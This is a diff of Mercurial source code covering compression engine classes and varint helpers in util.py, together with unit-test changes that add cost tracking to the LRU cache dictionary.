3541 3562 # memory usage for large inputs. So do streaming compression
3542 3563 # on large inputs.
3543 3564 else:
3544 3565 z = zlib.compressobj()
3545 3566 parts = []
3546 3567 pos = 0
3547 3568 while pos < insize:
3548 3569 pos2 = pos + 2**20
3549 3570 parts.append(z.compress(data[pos:pos2]))
3550 3571 pos = pos2
3551 3572 parts.append(z.flush())
3552 3573
3553 3574 if sum(map(len, parts)) < insize:
3554 3575 return ''.join(parts)
3555 3576 return None
3556 3577
3557 3578 def decompress(self, data):
3558 3579 try:
3559 3580 return zlib.decompress(data)
3560 3581 except zlib.error as e:
3561 3582 raise error.RevlogError(_('revlog decompress error: %s') %
3562 3583 stringutil.forcebytestr(e))
3563 3584
3564 3585 def revlogcompressor(self, opts=None):
3565 3586 return self.zlibrevlogcompressor()
3566 3587
3567 3588 compengines.register(_zlibengine())
3568 3589
3569 3590 class _bz2engine(compressionengine):
3570 3591 def name(self):
3571 3592 return 'bz2'
3572 3593
3573 3594 def bundletype(self):
3574 3595 """An algorithm that produces smaller bundles than ``gzip``.
3575 3596
3576 3597 All Mercurial clients should support this format.
3577 3598
3578 3599 This engine will likely produce smaller bundles than ``gzip`` but
3579 3600 will be significantly slower, both during compression and
3580 3601 decompression.
3581 3602
3582 3603 If available, the ``zstd`` engine can yield similar or better
3583 3604 compression at much higher speeds.
3584 3605 """
3585 3606 return 'bzip2', 'BZ'
3586 3607
3587 3608 # We declare a protocol name but don't advertise by default because
3588 3609 # it is slow.
3589 3610 def wireprotosupport(self):
3590 3611 return compewireprotosupport('bzip2', 0, 0)
3591 3612
3592 3613 def compressstream(self, it, opts=None):
3593 3614 opts = opts or {}
3594 3615 z = bz2.BZ2Compressor(opts.get('level', 9))
3595 3616 for chunk in it:
3596 3617 data = z.compress(chunk)
3597 3618 if data:
3598 3619 yield data
3599 3620
3600 3621 yield z.flush()
3601 3622
3602 3623 def decompressorreader(self, fh):
3603 3624 return _BZ2CompressedStreamReader(fh)
3604 3625
3605 3626 compengines.register(_bz2engine())
3606 3627
3607 3628 class _truncatedbz2engine(compressionengine):
3608 3629 def name(self):
3609 3630 return 'bz2truncated'
3610 3631
3611 3632 def bundletype(self):
3612 3633 return None, '_truncatedBZ'
3613 3634
3614 3635 # We don't implement compressstream because it is hackily handled elsewhere.
3615 3636
3616 3637 def decompressorreader(self, fh):
3617 3638 return _TruncatedBZ2CompressedStreamReader(fh)
3618 3639
3619 3640 compengines.register(_truncatedbz2engine())
3620 3641
3621 3642 class _noopengine(compressionengine):
3622 3643 def name(self):
3623 3644 return 'none'
3624 3645
3625 3646 def bundletype(self):
3626 3647 """No compression is performed.
3627 3648
3628 3649 Use this compression engine to explicitly disable compression.
3629 3650 """
3630 3651 return 'none', 'UN'
3631 3652
3632 3653 # Clients always support uncompressed payloads. Servers don't because
3633 3654 # unless you are on a fast network, uncompressed payloads can easily
3634 3655 # saturate your network pipe.
3635 3656 def wireprotosupport(self):
3636 3657 return compewireprotosupport('none', 0, 10)
3637 3658
3638 3659 # We don't implement revlogheader because it is handled specially
3639 3660 # in the revlog class.
3640 3661
3641 3662 def compressstream(self, it, opts=None):
3642 3663 return it
3643 3664
3644 3665 def decompressorreader(self, fh):
3645 3666 return fh
3646 3667
3647 3668 class nooprevlogcompressor(object):
3648 3669 def compress(self, data):
3649 3670 return None
3650 3671
3651 3672 def revlogcompressor(self, opts=None):
3652 3673 return self.nooprevlogcompressor()
3653 3674
3654 3675 compengines.register(_noopengine())
3655 3676
3656 3677 class _zstdengine(compressionengine):
3657 3678 def name(self):
3658 3679 return 'zstd'
3659 3680
3660 3681 @propertycache
3661 3682 def _module(self):
3662 3683 # Not all installs have the zstd module available. So defer importing
3663 3684 # until first access.
3664 3685 try:
3665 3686 from . import zstd
3666 3687 # Force delayed import.
3667 3688 zstd.__version__
3668 3689 return zstd
3669 3690 except ImportError:
3670 3691 return None
3671 3692
3672 3693 def available(self):
3673 3694 return bool(self._module)
3674 3695
3675 3696 def bundletype(self):
3676 3697 """A modern compression algorithm that is fast and highly flexible.
3677 3698
3678 3699 Only supported by Mercurial 4.1 and newer clients.
3679 3700
3680 3701 With the default settings, zstd compression is both faster and yields
3681 3702 better compression than ``gzip``. It also frequently yields better
3682 3703 compression than ``bzip2`` while operating at much higher speeds.
3683 3704
3684 3705 If this engine is available and backwards compatibility is not a
3685 3706 concern, it is likely the best available engine.
3686 3707 """
3687 3708 return 'zstd', 'ZS'
3688 3709
3689 3710 def wireprotosupport(self):
3690 3711 return compewireprotosupport('zstd', 50, 50)
3691 3712
3692 3713 def revlogheader(self):
3693 3714 return '\x28'
3694 3715
3695 3716 def compressstream(self, it, opts=None):
3696 3717 opts = opts or {}
3697 3718 # zstd level 3 is almost always significantly faster than zlib
3698 3719 # while providing no worse compression. It strikes a good balance
3699 3720 # between speed and compression.
3700 3721 level = opts.get('level', 3)
3701 3722
3702 3723 zstd = self._module
3703 3724 z = zstd.ZstdCompressor(level=level).compressobj()
3704 3725 for chunk in it:
3705 3726 data = z.compress(chunk)
3706 3727 if data:
3707 3728 yield data
3708 3729
3709 3730 yield z.flush()
3710 3731
3711 3732 def decompressorreader(self, fh):
3712 3733 return _ZstdCompressedStreamReader(fh, self._module)
3713 3734
3714 3735 class zstdrevlogcompressor(object):
3715 3736 def __init__(self, zstd, level=3):
3716 3737 # TODO consider omitting frame magic to save 4 bytes.
3717 3738 # This writes content sizes into the frame header. That is
3718 3739 # extra storage. But it allows a correct size memory allocation
3719 3740 # to hold the result.
3720 3741 self._cctx = zstd.ZstdCompressor(level=level)
3721 3742 self._dctx = zstd.ZstdDecompressor()
3722 3743 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3723 3744 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3724 3745
3725 3746 def compress(self, data):
3726 3747 insize = len(data)
3727 3748 # Caller handles empty input case.
3728 3749 assert insize > 0
3729 3750
3730 3751 if insize < 50:
3731 3752 return None
3732 3753
3733 3754 elif insize <= 1000000:
3734 3755 compressed = self._cctx.compress(data)
3735 3756 if len(compressed) < insize:
3736 3757 return compressed
3737 3758 return None
3738 3759 else:
3739 3760 z = self._cctx.compressobj()
3740 3761 chunks = []
3741 3762 pos = 0
3742 3763 while pos < insize:
3743 3764 pos2 = pos + self._compinsize
3744 3765 chunk = z.compress(data[pos:pos2])
3745 3766 if chunk:
3746 3767 chunks.append(chunk)
3747 3768 pos = pos2
3748 3769 chunks.append(z.flush())
3749 3770
3750 3771 if sum(map(len, chunks)) < insize:
3751 3772 return ''.join(chunks)
3752 3773 return None
3753 3774
3754 3775 def decompress(self, data):
3755 3776 insize = len(data)
3756 3777
3757 3778 try:
3758 3779 # This was measured to be faster than other streaming
3759 3780 # decompressors.
3760 3781 dobj = self._dctx.decompressobj()
3761 3782 chunks = []
3762 3783 pos = 0
3763 3784 while pos < insize:
3764 3785 pos2 = pos + self._decompinsize
3765 3786 chunk = dobj.decompress(data[pos:pos2])
3766 3787 if chunk:
3767 3788 chunks.append(chunk)
3768 3789 pos = pos2
3769 3790 # Frame should be exhausted, so no finish() API.
3770 3791
3771 3792 return ''.join(chunks)
3772 3793 except Exception as e:
3773 3794 raise error.RevlogError(_('revlog decompress error: %s') %
3774 3795 stringutil.forcebytestr(e))
3775 3796
3776 3797 def revlogcompressor(self, opts=None):
3777 3798 opts = opts or {}
3778 3799 return self.zstdrevlogcompressor(self._module,
3779 3800 level=opts.get('level', 3))
3780 3801
3781 3802 compengines.register(_zstdengine())
3782 3803
3783 3804 def bundlecompressiontopics():
3784 3805 """Obtains a list of available bundle compressions for use in help."""
3785 3806 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3786 3807 items = {}
3787 3808
3788 3809 # We need to format the docstring. So use a dummy object/type to hold it
3789 3810 # rather than mutating the original.
3790 3811 class docobject(object):
3791 3812 pass
3792 3813
3793 3814 for name in compengines:
3794 3815 engine = compengines[name]
3795 3816
3796 3817 if not engine.available():
3797 3818 continue
3798 3819
3799 3820 bt = engine.bundletype()
3800 3821 if not bt or not bt[0]:
3801 3822 continue
3802 3823
3803 3824 doc = pycompat.sysstr('``%s``\n %s') % (
3804 3825 bt[0], engine.bundletype.__doc__)
3805 3826
3806 3827 value = docobject()
3807 3828 value.__doc__ = doc
3808 3829 value._origdoc = engine.bundletype.__doc__
3809 3830 value._origfunc = engine.bundletype
3810 3831
3811 3832 items[bt[0]] = value
3812 3833
3813 3834 return items
3814 3835
3815 3836 i18nfunctions = bundlecompressiontopics().values()
3816 3837
3817 3838 # convenient shortcut
3818 3839 dst = debugstacktrace
3819 3840
3820 3841 def safename(f, tag, ctx, others=None):
3821 3842 """
3822 3843 Generate a name that f can safely be renamed to in the given context.
3823 3844
3824 3845 f: filename to rename
3825 3846 tag: a string tag that will be included in the new name
3826 3847 ctx: a context, in which the new name must not exist
3827 3848 others: a set of other filenames that the new name must not be in
3828 3849
3829 3850 Returns a file name of the form oldname~tag[~number] which does not exist
3830 3851 in the provided context and is not in the set of other names.
3831 3852 """
3832 3853 if others is None:
3833 3854 others = set()
3834 3855
3835 3856 fn = '%s~%s' % (f, tag)
3836 3857 if fn not in ctx and fn not in others:
3837 3858 return fn
3838 3859 for n in itertools.count(1):
3839 3860 fn = '%s~%s~%s' % (f, tag, n)
3840 3861 if fn not in ctx and fn not in others:
3841 3862 return fn
3842 3863
3843 3864 def readexactly(stream, n):
3844 3865 '''read n bytes from stream.read and abort if fewer are available'''
3845 3866 s = stream.read(n)
3846 3867 if len(s) < n:
3847 3868 raise error.Abort(_("stream ended unexpectedly"
3848 3869 " (got %d bytes, expected %d)")
3849 3870 % (len(s), n))
3850 3871 return s
3851 3872
3852 3873 def uvarintencode(value):
3853 3874 """Encode an unsigned integer value to a varint.
3854 3875
3855 3876 A varint is a variable length integer of 1 or more bytes. Each byte
3856 3877 except the last has the most significant bit set. The lower 7 bits of
3857 3878 each byte store the 2's complement representation, least significant group
3858 3879 first.
3859 3880
3860 3881 >>> uvarintencode(0)
3861 3882 '\\x00'
3862 3883 >>> uvarintencode(1)
3863 3884 '\\x01'
3864 3885 >>> uvarintencode(127)
3865 3886 '\\x7f'
3866 3887 >>> uvarintencode(1337)
3867 3888 '\\xb9\\n'
3868 3889 >>> uvarintencode(65536)
3869 3890 '\\x80\\x80\\x04'
3870 3891 >>> uvarintencode(-1)
3871 3892 Traceback (most recent call last):
3872 3893 ...
3873 3894 ProgrammingError: negative value for uvarint: -1
3874 3895 """
3875 3896 if value < 0:
3876 3897 raise error.ProgrammingError('negative value for uvarint: %d'
3877 3898 % value)
3878 3899 bits = value & 0x7f
3879 3900 value >>= 7
3880 3901 bytes = []
3881 3902 while value:
3882 3903 bytes.append(pycompat.bytechr(0x80 | bits))
3883 3904 bits = value & 0x7f
3884 3905 value >>= 7
3885 3906 bytes.append(pycompat.bytechr(bits))
3886 3907
3887 3908 return ''.join(bytes)
3888 3909
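Working through the 1337 doctest above: 1337 is 0b10100111001, split into 7-bit groups from the least significant end:

    # group 0: 0b0111001 = 0x39 -> continuation bit set: 0x80 | 0x39 = 0xb9
    # group 1: 0b0001010 = 0x0a -> last byte, emitted as-is
    # hence uvarintencode(1337) == '\xb9\x0a', rendered '\xb9\n'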
3889 3910 def uvarintdecodestream(fh):
3890 3911 """Decode an unsigned variable length integer from a stream.
3891 3912
3892 3913 The passed argument is anything that has a ``.read(N)`` method.
3893 3914
3894 3915 >>> try:
3895 3916 ... from StringIO import StringIO as BytesIO
3896 3917 ... except ImportError:
3897 3918 ... from io import BytesIO
3898 3919 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3899 3920 0
3900 3921 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3901 3922 1
3902 3923 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3903 3924 127
3904 3925 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3905 3926 1337
3906 3927 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3907 3928 65536
3908 3929 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3909 3930 Traceback (most recent call last):
3910 3931 ...
3911 3932 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3912 3933 """
3913 3934 result = 0
3914 3935 shift = 0
3915 3936 while True:
3916 3937 byte = ord(readexactly(fh, 1))
3917 3938 result |= ((byte & 0x7f) << shift)
3918 3939 if not (byte & 0x80):
3919 3940 return result
3920 3941 shift += 7
@@ -1,201 +1,221 b''
1 1 from __future__ import absolute_import, print_function
2 2
3 3 import unittest
4 4
5 5 import silenttestrunner
6 6
7 7 from mercurial import (
8 8 util,
9 9 )
10 10
11 11 class testlrucachedict(unittest.TestCase):
12 12 def testsimple(self):
13 13 d = util.lrucachedict(4)
14 14 self.assertEqual(d.capacity, 4)
15 d['a'] = 'va'
15 d.insert('a', 'va', cost=2)
16 16 d['b'] = 'vb'
17 17 d['c'] = 'vc'
18 d['d'] = 'vd'
18 d.insert('d', 'vd', cost=42)
19 19
20 20 self.assertEqual(d['a'], 'va')
21 21 self.assertEqual(d['b'], 'vb')
22 22 self.assertEqual(d['c'], 'vc')
23 23 self.assertEqual(d['d'], 'vd')
24 24
25 self.assertEqual(d.totalcost, 44)
26
25 27 # 'a' should be dropped because it was least recently used.
26 28 d['e'] = 've'
27 29 self.assertNotIn('a', d)
28
29 30 self.assertIsNone(d.get('a'))
31 self.assertEqual(d.totalcost, 42)
30 32
31 33 self.assertEqual(d['b'], 'vb')
32 34 self.assertEqual(d['c'], 'vc')
33 35 self.assertEqual(d['d'], 'vd')
34 36 self.assertEqual(d['e'], 've')
35 37
38 # Replacing item with different cost adjusts totalcost.
39 d.insert('e', 've', cost=4)
40 self.assertEqual(d.totalcost, 46)
41
36 42 # Touch entries in some order (both get and set).
37 43 d['e']
38 44 d['c'] = 'vc2'
39 45 d['d']
40 46 d['b'] = 'vb2'
41 47
42 48 # 'e' should be dropped now
43 49 d['f'] = 'vf'
44 50 self.assertNotIn('e', d)
45 51 self.assertEqual(d['b'], 'vb2')
46 52 self.assertEqual(d['c'], 'vc2')
47 53 self.assertEqual(d['d'], 'vd')
48 54 self.assertEqual(d['f'], 'vf')
49 55
50 56 d.clear()
51 57 for key in ('a', 'b', 'c', 'd', 'e', 'f'):
52 58 self.assertNotIn(key, d)
53 59
54 60 def testunfull(self):
55 61 d = util.lrucachedict(4)
56 62 d['a'] = 1
57 63 d['b'] = 2
58 64 d['a']
59 65 d['b']
60 66
61 67 for key in ('a', 'b'):
62 68 self.assertIn(key, d)
63 69
64 70 def testcopypartial(self):
65 71 d = util.lrucachedict(4)
66 d['a'] = 'va'
67 d['b'] = 'vb'
72 d.insert('a', 'va', cost=4)
73 d.insert('b', 'vb', cost=2)
68 74
69 75 dc = d.copy()
70 76
71 77 self.assertEqual(len(dc), 2)
78 self.assertEqual(dc.totalcost, 6)
72 79 for key in ('a', 'b'):
73 80 self.assertIn(key, dc)
74 81 self.assertEqual(dc[key], 'v%s' % key)
75 82
76 83 self.assertEqual(len(d), 2)
77 84 for key in ('a', 'b'):
78 85 self.assertIn(key, d)
79 86 self.assertEqual(d[key], 'v%s' % key)
80 87
81 88 d['c'] = 'vc'
82 89 del d['b']
90 self.assertEqual(d.totalcost, 4)
83 91 dc = d.copy()
84 92 self.assertEqual(len(dc), 2)
93 self.assertEqual(dc.totalcost, 4)
85 94 for key in ('a', 'c'):
86 95 self.assertIn(key, dc)
87 96 self.assertEqual(dc[key], 'v%s' % key)
88 97
89 98 def testcopyempty(self):
90 99 d = util.lrucachedict(4)
91 100 dc = d.copy()
92 101 self.assertEqual(len(dc), 0)
93 102
94 103 def testcopyfull(self):
95 104 d = util.lrucachedict(4)
96 d['a'] = 'va'
105 d.insert('a', 'va', cost=42)
97 106 d['b'] = 'vb'
98 107 d['c'] = 'vc'
99 108 d['d'] = 'vd'
100 109
101 110 dc = d.copy()
102 111
103 112 for key in ('a', 'b', 'c', 'd'):
104 113 self.assertIn(key, dc)
105 114 self.assertEqual(dc[key], 'v%s' % key)
106 115
116 self.assertEqual(d.totalcost, 42)
117 self.assertEqual(dc.totalcost, 42)
118
107 119 # 'a' should be dropped because it was least recently used.
108 120 dc['e'] = 've'
109 121 self.assertNotIn('a', dc)
110 122 for key in ('b', 'c', 'd', 'e'):
111 123 self.assertIn(key, dc)
112 124 self.assertEqual(dc[key], 'v%s' % key)
113 125
126 self.assertEqual(d.totalcost, 42)
127 self.assertEqual(dc.totalcost, 0)
128
114 129 # Contents and order of original dict should remain unchanged.
115 130 dc['b'] = 'vb_new'
116 131
117 132 self.assertEqual(list(iter(d)), ['d', 'c', 'b', 'a'])
118 133 for key in ('a', 'b', 'c', 'd'):
119 134 self.assertEqual(d[key], 'v%s' % key)
120 135
121 136 def testcopydecreasecapacity(self):
122 137 d = util.lrucachedict(5)
123 d['a'] = 'va'
124 d['b'] = 'vb'
138 d.insert('a', 'va', cost=4)
139 d.insert('b', 'vb', cost=2)
125 140 d['c'] = 'vc'
126 141 d['d'] = 'vd'
127 142
128 143 dc = d.copy(2)
144 self.assertEqual(dc.totalcost, 0)
129 145 for key in ('a', 'b'):
130 146 self.assertNotIn(key, dc)
131 147 for key in ('c', 'd'):
132 148 self.assertIn(key, dc)
133 149 self.assertEqual(dc[key], 'v%s' % key)
134 150
135 dc['e'] = 've'
151 dc.insert('e', 've', cost=7)
152 self.assertEqual(dc.totalcost, 7)
136 153 self.assertNotIn('c', dc)
137 154 for key in ('d', 'e'):
138 155 self.assertIn(key, dc)
139 156 self.assertEqual(dc[key], 'v%s' % key)
140 157
141 158 # Original should remain unchanged.
159 self.assertEqual(d.totalcost, 6)
142 160 for key in ('a', 'b', 'c', 'd'):
143 161 self.assertIn(key, d)
144 162 self.assertEqual(d[key], 'v%s' % key)
145 163
146 164 def testcopyincreasecapacity(self):
147 165 d = util.lrucachedict(5)
148 166 d['a'] = 'va'
149 167 d['b'] = 'vb'
150 168 d['c'] = 'vc'
151 169 d['d'] = 'vd'
152 170
153 171 dc = d.copy(6)
154 172 for key in ('a', 'b', 'c', 'd'):
155 173 self.assertIn(key, dc)
156 174 self.assertEqual(dc[key], 'v%s' % key)
157 175
158 176 dc['e'] = 've'
159 177 dc['f'] = 'vf'
160 178 for key in ('a', 'b', 'c', 'd', 'e', 'f'):
161 179 self.assertIn(key, dc)
162 180 self.assertEqual(dc[key], 'v%s' % key)
163 181
164 182 dc['g'] = 'vg'
165 183 self.assertNotIn('a', dc)
166 184 for key in ('b', 'c', 'd', 'e', 'f', 'g'):
167 185 self.assertIn(key, dc)
168 186 self.assertEqual(dc[key], 'v%s' % key)
169 187
170 188 # Original should remain unchanged.
171 189 for key in ('a', 'b', 'c', 'd'):
172 190 self.assertIn(key, d)
173 191 self.assertEqual(d[key], 'v%s' % key)
174 192
175 193 def testpopoldest(self):
176 194 d = util.lrucachedict(4)
177 d['a'] = 'va'
178 d['b'] = 'vb'
195 d.insert('a', 'va', cost=10)
196 d.insert('b', 'vb', cost=5)
179 197
180 198 self.assertEqual(len(d), 2)
181 199 self.assertEqual(d.popoldest(), ('a', 'va'))
182 200 self.assertEqual(len(d), 1)
201 self.assertEqual(d.totalcost, 5)
183 202 self.assertEqual(d.popoldest(), ('b', 'vb'))
184 203 self.assertEqual(len(d), 0)
204 self.assertEqual(d.totalcost, 0)
185 205 self.assertIsNone(d.popoldest())
186 206
187 207 d['a'] = 'va'
188 208 d['b'] = 'vb'
189 209 d['c'] = 'vc'
190 210 d['d'] = 'vd'
191 211
192 212 self.assertEqual(d.popoldest(), ('a', 'va'))
193 213 self.assertEqual(len(d), 3)
194 214 for key in ('b', 'c', 'd'):
195 215 self.assertEqual(d[key], 'v%s' % key)
196 216
197 217 d['a'] = 'va'
198 218 self.assertEqual(d.popoldest(), ('b', 'vb'))
199 219
200 220 if __name__ == '__main__':
201 221 silenttestrunner.main(__name__)
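As a sketch of the cost-tracking API these tests exercise (capacity, keys and costs are illustrative):

    d = util.lrucachedict(2)
    d.insert('x', 'vx', cost=10)  # insert() takes an optional cost
    d['y'] = 'vy'                 # plain assignment records no cost
    d.totalcost                   # -> 10
    d['z'] = 'vz'                 # evicts least-recently-used 'x'
    d.totalcost                   # -> 0: the evicted entry's cost is freed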